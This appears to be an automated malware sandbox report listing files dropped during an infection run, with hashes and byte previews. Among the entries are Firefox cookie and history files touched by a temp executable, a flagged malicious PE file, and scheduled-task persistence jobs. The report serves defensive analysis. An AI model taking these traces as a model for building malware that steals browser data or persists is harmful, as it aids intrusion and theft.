Preview:	L..................F.@.. ...$+.,....![w..W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.\....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.\....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.\....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.\..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.\...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........)..}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.005451280769629
Encrypted:	false
SSDEEP:	48:8xwdjTLfsHAidAKZdA14tseh7sFiZUkmgqeh7sZy+BX:8xsXJnLy
MD5:	4D930E9709EF1216DEA52B99B3FA7EEF
SHA1:	02D263CCF98C4909CC9AFDB8B3ADD4704448E6D0
SHA-256:	D5696E91822FA1A49BBD891F6F854153DEB02E757823DD2D9ECD93BAF9210B3C
SHA-512:	CA3FEB64DF518F5A22AED8E75792D7720985BDA024BFFD821BEE0837733BB674BAA3575385358AD92C4B80F82F6BE4E9BC494231015132F5BF177CC4B4E67829
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.\....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.\....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.\....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.\..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........)..}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 10:37:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.988672242864089
Encrypted:	false
SSDEEP:	48:8kdjTLfOHAidAKZdA1vehDiZUkwqehTy+R:8wXMBy
MD5:	FCE29101A9ECE44B7D973563B6A79634
SHA1:	30760D81E712D17D87070E7DCCB650836F10FABC
SHA-256:	A8F7405DE78F40529F277232B19D2210B80DA06F3B5B6AD59947AFF979318590
SHA-512:	976511EB0BC86132184D8EEED4BB49B601CB4A99EE7BC7DC71BEDFAE574F4E6740868EB9DF340682B02F98B56D0E9FCFAFBA4DE5638A8556ABF90CD4D11C949F
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....3p..W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.\....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.\....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.\....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.\..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.\...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........)..}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 10:37:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9801409798284957
Encrypted:	false
SSDEEP:	48:8XdjTLfOHAidAKZdA1hehBiZUk1W1qehVy+C:8xX891y
MD5:	0ACAF14A2B58644CE2E375460D7B8428
SHA1:	87D4C01DC70CA7D7EF6BD89179493D2790AD6428
SHA-256:	67B05AF90351736A14173238525B2BE96D2263926B22A3C2694E1415E9531AAA
SHA-512:	679D6082CAF5F7DC6C093E4AC550126AC84480D761EE89BBCF4AA8A4AA13EB2C4991392274A62D973E8E075B9C7A74AE399BB045DC3AFBD7337FACBC5891A5E8
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....~..W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.\....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.\....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.\....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.\..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.\...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........)..}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 10:37:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9889220660602205
Encrypted:	false
SSDEEP:	48:8ldjTLfOHAidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbLy+yT+:8LXST/TbxWOvTbLy7T
MD5:	DE4D291AFDD5855E7996C6515CF1523C
SHA1:	F766E8DE55696A60D1D521279264EB712508548B
SHA-256:	D098380DC69D81A69195384CC2B31C4EA42D5B86F9680E49DE9559AD07D7795A
SHA-512:	492E6E57FC48F9EC82CC9AFB599A1333145EA4CCF7CB1613BF76A8A0C6A4A58D06E05DEC7CAF7903A25DD5076348EAA41F0F639D8CFC665489DE099602F6ACCF
Malicious:	false
Preview:	L..................F.@.. ...$+.,....b.f..W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.\....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.\....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.\....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.\..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.\...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........)..}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\FIJECAEHJJ.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243008
Entropy (8bit):	6.650093644272246
Encrypted:	false
SSDEEP:	49152:ihw05uwGDAu9kS8AmainjRha/nxaIYd1s6l8ua3yflGAM:ovu9kS8AmainjLgn4LM6l8t3QLM
MD5:	D297F9F22080C6F66B4E9C9156A6FF86
SHA1:	BEF0F2E329D9DB6BAFE18B63482545B79B3D3C47
SHA-256:	D2A41394DA3C958EEECD0C43A72E5C401FD5209E462B0035BD1BA5DD9B4A6B46
SHA-512:	4FC5D9229C3174FB76947190458D56FF76133F286295AB4CE439E64DCC5DB5D0289C734EB4C7EE49DB7636CB2E9B22649009C7B7F920806D327710BF2618BB94
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.......1...@.................................W...k...........................Pl1..............................l1..................................................... . ............................@....rsrc...............................@....idata ............................@...bwzzahtg..........................@...rhjmaeag.....p1......V1.............@....taggant.0....1.."...Z1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.4607045400905534
Encrypted:	false
SSDEEP:	6:cxjLX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0lIt0:IjbDQ1lOmeeDNfXVIt0
MD5:	7F1BD6750559C3A591E27C7F669C00D8
SHA1:	26FAED17757059420FD1DDA39D3904F48D4DAB10
SHA-256:	28B0D9100C3DE658BA175CEBCAB3DB349D778FC910DB8638A34A8D0267A166C0
SHA-512:	56A2B098800C503F7A33BD1E25CF79E38C0F235BC888D5AA3B3234489DB5F68E27075C923A883B1C6BD4CE7C3002BBF5B1D9790C46058533F3038068AAECB551
Malicious:	false
Preview:	........v..K..M.=.N.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................(.@3P.........................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4403273408445063
Encrypted:	false
SSDEEP:	6:qNeMX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lx1ut0:VWuQ1CGAFifXVxct0
MD5:	F2EE1D0C75D7282E1CFF6AC30A0056B2
SHA1:	D21CB3A99D6F019036199789F8FCD05B6C76B1C7
SHA-256:	FD704459CB776DFAFF5B971A92795261A0CAACA457F07DC0C0D090997BFB0831
SHA-512:	DD690373CCC612BB69FC051DC1B803C1BA7D7C8FF85AE68CF72BF065CE7AF1E3752F011F3B47A52FF57F9C4C7F1A5278029172B90E68ECE5E9BE9103290F3FDD
Malicious:	false
Preview:	......E...XC.j@..+.IF.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................&.@3P.........................

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (6459)
Category:	downloaded
Size (bytes):	6464
Entropy (8bit):	5.814563925446097
Encrypted:	false
SSDEEP:	96:10DlixIN6666V4KRAFuDlvDZbyOucqN4rraDBrbo9jCT43JWWJKUHipX9yt3z9fP:1KbN6666VrAGZ3kxM9jpWiKUHiQ1
MD5:	08DFA9409429DB1CC56495A46D52A3F7
SHA1:	D9CF090FFF2BD0D493E460B02F4626ADDE2B7B63
SHA-256:	C8073ED6CDFE35FE3102BA3C10BCDDFC2168C03A4EAFA18B2B0DDB46A4849795
SHA-512:	F3E2AFD79B3C9631DD5639159DA4056143C29FD62F4E475861F96A89B60D9F1B34181C88F2FC26D27379F684939195E1BF1BC7A4E2F184C55E80014727CDCF7C
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["rico abreu","zodiac signs daily horoscope december 26","burger king free food","paris eiffel tower fire","christmas eve aurora borealis forecast","epic games store free games","san francisco 49ers","dc comics harley quinn fart comic"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"CgsvbS8wMTJudnM4YxIiQW1lcmljYW4gbW90b3JzcG9ydHMgcmFjaW5nIGRyaXZlcjL7EGRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQUZCZ01FQndJQUFmL0VBRElRQUFJQkF3SURCd0lGQlFFQUFBQUFBQUVDQXdRRkVRQWhCaEl4RXlKQlVXRnhrVEtCRktHeDBlRUhJelBCOFNUL3hBQVpBUUFDQXdF

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132723
Entropy (8bit):	5.436814598023055
Encrypted:	false
SSDEEP:	3072:fXkJQ7O4N5dTm+syHEt4W3XdQ4Q6yuSr/nUW2i6o:fCQ7HTt/sHdQ4Q6yDfUW8o
MD5:	328C2FB6C78413719DA7393AA3A0A581
SHA1:	2A63E9D125D613934C3135E97A8169E30D6B50C8
SHA-256:	1F100FA3DC032D6A29B096C2F63586F4E39873CEF2B99E2E23D93C7A23FB0B08
SHA-512:	C2C08F098CFB5B507C7A6E791C7A4E91B61A4F9CEDDA7D2A9055CF825108A606C32F1D65515094773F6DE770BE11FE529D178AC2051D5C1A4E4F31B9625ECCFA
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2410)
Category:	downloaded
Size (bytes):	175897
Entropy (8bit):	5.549876394125764
Encrypted:	false
SSDEEP:	3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
MD5:	2368B9A3E1E7C13C00884BE7FA1F0DFC
SHA1:	8F88AD448B22177E2BDA0484648C23CA1D2AA09E
SHA-256:	577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
SHA-512:	105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi\|\|(_.Yi=new Zi)).set(a,b);(_.$i\|\|(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a\|2:a&-3;return(a\|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a\|1};_.hj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.ij=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
